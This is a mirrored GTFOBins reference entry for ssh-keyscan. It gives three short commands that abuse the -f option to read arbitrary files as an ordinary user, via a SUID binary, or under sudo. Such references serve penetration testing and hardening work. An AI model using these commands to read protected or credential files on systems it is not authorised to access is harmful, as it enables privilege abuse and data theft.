1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-11 01:41:33 +01:00
GTFOBins.github.io/_gtfobins/ssh-keyscan.md
2020-11-12 14:33:06 +01:00

18 lines
343 B
Markdown

---
description: |
The read file content is corrupted by error prints.
functions:
file-read:
- code: |
LFILE=file_to_read
ssh-keyscan -f "$LFILE"
suid:
- code: |
LFILE=file_to_read
./ssh-keyscan -f "$LFILE"
sudo:
- code: |
LFILE=file_to_read
sudo ssh-keyscan -f "$LFILE"
---